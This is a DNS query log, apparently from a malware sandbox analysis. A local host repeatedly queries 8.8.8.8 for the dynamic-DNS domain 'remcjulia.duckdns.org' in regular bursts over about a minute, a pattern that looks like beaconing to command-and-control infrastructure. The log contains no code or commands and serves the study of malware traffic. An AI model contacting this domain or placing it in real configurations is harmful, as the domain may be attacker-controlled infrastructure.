Apr 24, 2024 10:26:13.563674927 CEST	192.168.2.22	8.8.8.8	0x6047	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:13.733809948 CEST	192.168.2.22	8.8.8.8	0x6047	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:13.905854940 CEST	192.168.2.22	8.8.8.8	0x6047	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:14.076961994 CEST	192.168.2.22	8.8.8.8	0x6047	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.263612032 CEST	192.168.2.22	8.8.8.8	0x5211	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.438158989 CEST	192.168.2.22	8.8.8.8	0x5211	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.612039089 CEST	192.168.2.22	8.8.8.8	0x5211	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.781912088 CEST	192.168.2.22	8.8.8.8	0x5211	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:15.956006050 CEST	192.168.2.22	8.8.8.8	0x5211	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.141819000 CEST	192.168.2.22	8.8.8.8	0x9861	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.312514067 CEST	192.168.2.22	8.8.8.8	0x9861	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.483541012 CEST	192.168.2.22	8.8.8.8	0x9861	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.655766010 CEST	192.168.2.22	8.8.8.8	0x9861	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:17.827779055 CEST	192.168.2.22	8.8.8.8	0x9861	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.017961979 CEST	192.168.2.22	8.8.8.8	0x2496	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.263251066 CEST	192.168.2.22	8.8.8.8	0x2496	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.433320999 CEST	192.168.2.22	8.8.8.8	0x2496	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.604360104 CEST	192.168.2.22	8.8.8.8	0x2496	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:19.778085947 CEST	192.168.2.22	8.8.8.8	0x2496	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:20.967439890 CEST	192.168.2.22	8.8.8.8	0xb79d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.137948036 CEST	192.168.2.22	8.8.8.8	0xb79d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.307370901 CEST	192.168.2.22	8.8.8.8	0xb79d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.478739023 CEST	192.168.2.22	8.8.8.8	0xb79d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:21.649736881 CEST	192.168.2.22	8.8.8.8	0xb79d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:22.837414026 CEST	192.168.2.22	8.8.8.8	0x12b7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.008045912 CEST	192.168.2.22	8.8.8.8	0x12b7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.178286076 CEST	192.168.2.22	8.8.8.8	0x12b7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.350197077 CEST	192.168.2.22	8.8.8.8	0x12b7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:23.526859999 CEST	192.168.2.22	8.8.8.8	0x12b7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:24.729510069 CEST	192.168.2.22	8.8.8.8	0x4e6d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:24.902626038 CEST	192.168.2.22	8.8.8.8	0x4e6d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:25.074109077 CEST	192.168.2.22	8.8.8.8	0x4e6d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:25.248095989 CEST	192.168.2.22	8.8.8.8	0x4e6d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:25.420064926 CEST	192.168.2.22	8.8.8.8	0x4e6d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:26.615236998 CEST	192.168.2.22	8.8.8.8	0x758b	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:26.789685011 CEST	192.168.2.22	8.8.8.8	0x758b	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:26.960366011 CEST	192.168.2.22	8.8.8.8	0x758b	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:27.134469986 CEST	192.168.2.22	8.8.8.8	0x758b	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:27.310321093 CEST	192.168.2.22	8.8.8.8	0x758b	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:28.498672962 CEST	192.168.2.22	8.8.8.8	0x274d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:28.669715881 CEST	192.168.2.22	8.8.8.8	0x274d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:28.843343973 CEST	192.168.2.22	8.8.8.8	0x274d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:29.014024019 CEST	192.168.2.22	8.8.8.8	0x274d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:29.188075066 CEST	192.168.2.22	8.8.8.8	0x274d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:30.378530025 CEST	192.168.2.22	8.8.8.8	0x4921	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:30.549201012 CEST	192.168.2.22	8.8.8.8	0x4921	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:30.719280005 CEST	192.168.2.22	8.8.8.8	0x4921	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:30.892087936 CEST	192.168.2.22	8.8.8.8	0x4921	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:31.066544056 CEST	192.168.2.22	8.8.8.8	0x4921	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.264113903 CEST	192.168.2.22	8.8.8.8	0x7538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.435990095 CEST	192.168.2.22	8.8.8.8	0x7538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.612020969 CEST	192.168.2.22	8.8.8.8	0x7538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.784038067 CEST	192.168.2.22	8.8.8.8	0x7538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.954375029 CEST	192.168.2.22	8.8.8.8	0x7538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.147094011 CEST	192.168.2.22	8.8.8.8	0x2979	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.322164059 CEST	192.168.2.22	8.8.8.8	0x2979	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.494247913 CEST	192.168.2.22	8.8.8.8	0x2979	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.666445017 CEST	192.168.2.22	8.8.8.8	0x2979	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.836266994 CEST	192.168.2.22	8.8.8.8	0x2979	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.022141933 CEST	192.168.2.22	8.8.8.8	0x92d7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.192116976 CEST	192.168.2.22	8.8.8.8	0x92d7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.385910988 CEST	192.168.2.22	8.8.8.8	0x92d7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.555946112 CEST	192.168.2.22	8.8.8.8	0x92d7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.725908995 CEST	192.168.2.22	8.8.8.8	0x92d7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:37.908126116 CEST	192.168.2.22	8.8.8.8	0xda8e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.082025051 CEST	192.168.2.22	8.8.8.8	0xda8e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.254729986 CEST	192.168.2.22	8.8.8.8	0xda8e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.436250925 CEST	192.168.2.22	8.8.8.8	0xda8e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.692132950 CEST	192.168.2.22	8.8.8.8	0xda8e	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:39.883049011 CEST	192.168.2.22	8.8.8.8	0xb816	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.063769102 CEST	192.168.2.22	8.8.8.8	0xb816	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.234283924 CEST	192.168.2.22	8.8.8.8	0xb816	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.409471035 CEST	192.168.2.22	8.8.8.8	0xb816	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.579416037 CEST	192.168.2.22	8.8.8.8	0xb816	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:41.760252953 CEST	192.168.2.22	8.8.8.8	0x9f70	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:41.930387974 CEST	192.168.2.22	8.8.8.8	0x9f70	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:42.102483988 CEST	192.168.2.22	8.8.8.8	0x9f70	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:42.274511099 CEST	192.168.2.22	8.8.8.8	0x9f70	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:42.444380045 CEST	192.168.2.22	8.8.8.8	0x9f70	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:43.633527994 CEST	192.168.2.22	8.8.8.8	0xddb	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:43.803612947 CEST	192.168.2.22	8.8.8.8	0xddb	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:43.974252939 CEST	192.168.2.22	8.8.8.8	0xddb	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:44.144788027 CEST	192.168.2.22	8.8.8.8	0xddb	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:44.314753056 CEST	192.168.2.22	8.8.8.8	0xddb	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:45.511540890 CEST	192.168.2.22	8.8.8.8	0x472	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:45.681195974 CEST	192.168.2.22	8.8.8.8	0x472	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:45.851459980 CEST	192.168.2.22	8.8.8.8	0x472	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:46.024245977 CEST	192.168.2.22	8.8.8.8	0x472	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:46.196147919 CEST	192.168.2.22	8.8.8.8	0x472	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:47.376566887 CEST	192.168.2.22	8.8.8.8	0x8e3d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:47.546252012 CEST	192.168.2.22	8.8.8.8	0x8e3d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:47.717948914 CEST	192.168.2.22	8.8.8.8	0x8e3d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:47.890384912 CEST	192.168.2.22	8.8.8.8	0x8e3d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:48.062460899 CEST	192.168.2.22	8.8.8.8	0x8e3d	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.293787003 CEST	192.168.2.22	8.8.8.8	0x1361	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.468005896 CEST	192.168.2.22	8.8.8.8	0x1361	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.642745972 CEST	192.168.2.22	8.8.8.8	0x1361	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.816121101 CEST	192.168.2.22	8.8.8.8	0x1361	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.989768982 CEST	192.168.2.22	8.8.8.8	0x1361	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.184731007 CEST	192.168.2.22	8.8.8.8	0xfcb2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.356460094 CEST	192.168.2.22	8.8.8.8	0xfcb2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.528373003 CEST	192.168.2.22	8.8.8.8	0xfcb2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.705147028 CEST	192.168.2.22	8.8.8.8	0xfcb2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.875488997 CEST	192.168.2.22	8.8.8.8	0xfcb2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.071609974 CEST	192.168.2.22	8.8.8.8	0xde6c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.244083881 CEST	192.168.2.22	8.8.8.8	0xde6c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.416080952 CEST	192.168.2.22	8.8.8.8	0xde6c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.586147070 CEST	192.168.2.22	8.8.8.8	0xde6c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.756022930 CEST	192.168.2.22	8.8.8.8	0xde6c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:54.942730904 CEST	192.168.2.22	8.8.8.8	0x9f80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.113914013 CEST	192.168.2.22	8.8.8.8	0x9f80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.291960001 CEST	192.168.2.22	8.8.8.8	0x9f80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.462747097 CEST	192.168.2.22	8.8.8.8	0x9f80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.633198977 CEST	192.168.2.22	8.8.8.8	0x9f80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:56.815146923 CEST	192.168.2.22	8.8.8.8	0xe076	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:56.985198975 CEST	192.168.2.22	8.8.8.8	0xe076	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:57.154947996 CEST	192.168.2.22	8.8.8.8	0xe076	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:57.331898928 CEST	192.168.2.22	8.8.8.8	0xe076	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:57.889547110 CEST	192.168.2.22	8.8.8.8	0xe076	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.076612949 CEST	192.168.2.22	8.8.8.8	0x43f2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.247564077 CEST	192.168.2.22	8.8.8.8	0x43f2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.424071074 CEST	192.168.2.22	8.8.8.8	0x43f2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.674339056 CEST	192.168.2.22	8.8.8.8	0x43f2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.844574928 CEST	192.168.2.22	8.8.8.8	0x43f2	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.053934097 CEST	192.168.2.22	8.8.8.8	0xfc7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.226421118 CEST	192.168.2.22	8.8.8.8	0xfc7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.402256012 CEST	192.168.2.22	8.8.8.8	0xfc7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.574209929 CEST	192.168.2.22	8.8.8.8	0xfc7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.748420954 CEST	192.168.2.22	8.8.8.8	0xfc7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:03.415186882 CEST	192.168.2.22	8.8.8.8	0x8915	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:03.586468935 CEST	192.168.2.22	8.8.8.8	0x8915	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:03.758188009 CEST	192.168.2.22	8.8.8.8	0x8915	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:03.943926096 CEST	192.168.2.22	8.8.8.8	0x8915	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:04.113923073 CEST	192.168.2.22	8.8.8.8	0x8915	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.298074961 CEST	192.168.2.22	8.8.8.8	0x9837	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.468683958 CEST	192.168.2.22	8.8.8.8	0x9837	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.641782045 CEST	192.168.2.22	8.8.8.8	0x9837	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.812838078 CEST	192.168.2.22	8.8.8.8	0x9837	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.984123945 CEST	192.168.2.22	8.8.8.8	0x9837	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:07.171912909 CEST	192.168.2.22	8.8.8.8	0x11e6	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:07.345752001 CEST	192.168.2.22	8.8.8.8	0x11e6	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:07.517827988 CEST	192.168.2.22	8.8.8.8	0x11e6	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:07.763237953 CEST	192.168.2.22	8.8.8.8	0x11e6	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:08.007713079 CEST	192.168.2.22	8.8.8.8	0x11e6	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.207320929 CEST	192.168.2.22	8.8.8.8	0xbe80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.456091881 CEST	192.168.2.22	8.8.8.8	0xbe80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.628160000 CEST	192.168.2.22	8.8.8.8	0xbe80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.805771112 CEST	192.168.2.22	8.8.8.8	0xbe80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.977200985 CEST	192.168.2.22	8.8.8.8	0xbe80	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.171346903 CEST	192.168.2.22	8.8.8.8	0x49f5	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.344038963 CEST	192.168.2.22	8.8.8.8	0x49f5	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.515832901 CEST	192.168.2.22	8.8.8.8	0x49f5	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.685666084 CEST	192.168.2.22	8.8.8.8	0x49f5	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.855257034 CEST	192.168.2.22	8.8.8.8	0x49f5	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.056180000 CEST	192.168.2.22	8.8.8.8	0x68cd	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.229625940 CEST	192.168.2.22	8.8.8.8	0x68cd	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.400440931 CEST	192.168.2.22	8.8.8.8	0x68cd	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.617816925 CEST	192.168.2.22	8.8.8.8	0x68cd	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.788574934 CEST	192.168.2.22	8.8.8.8	0x68cd	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:15.355403900 CEST	192.168.2.22	8.8.8.8	0x7a74	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:15.525897980 CEST	192.168.2.22	8.8.8.8	0x7a74	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:15.695857048 CEST	192.168.2.22	8.8.8.8	0x7a74	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:15.865652084 CEST	192.168.2.22	8.8.8.8	0x7a74	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:16.037744999 CEST	192.168.2.22	8.8.8.8	0x7a74	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.226687908 CEST	192.168.2.22	8.8.8.8	0xbf3	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.400820971 CEST	192.168.2.22	8.8.8.8	0xbf3	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.574054003 CEST	192.168.2.22	8.8.8.8	0xbf3	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.746754885 CEST	192.168.2.22	8.8.8.8	0xbf3	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.918768883 CEST	192.168.2.22	8.8.8.8	0xbf3	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.112514019 CEST	192.168.2.22	8.8.8.8	0x7d03	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.284691095 CEST	192.168.2.22	8.8.8.8	0x7d03	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.455954075 CEST	192.168.2.22	8.8.8.8	0x7d03	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.630024910 CEST	192.168.2.22	8.8.8.8	0x7d03	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.802915096 CEST	192.168.2.22	8.8.8.8	0x7d03	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.061506987 CEST	192.168.2.22	8.8.8.8	0x8f6f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.240917921 CEST	192.168.2.22	8.8.8.8	0x8f6f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.414764881 CEST	192.168.2.22	8.8.8.8	0x8f6f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
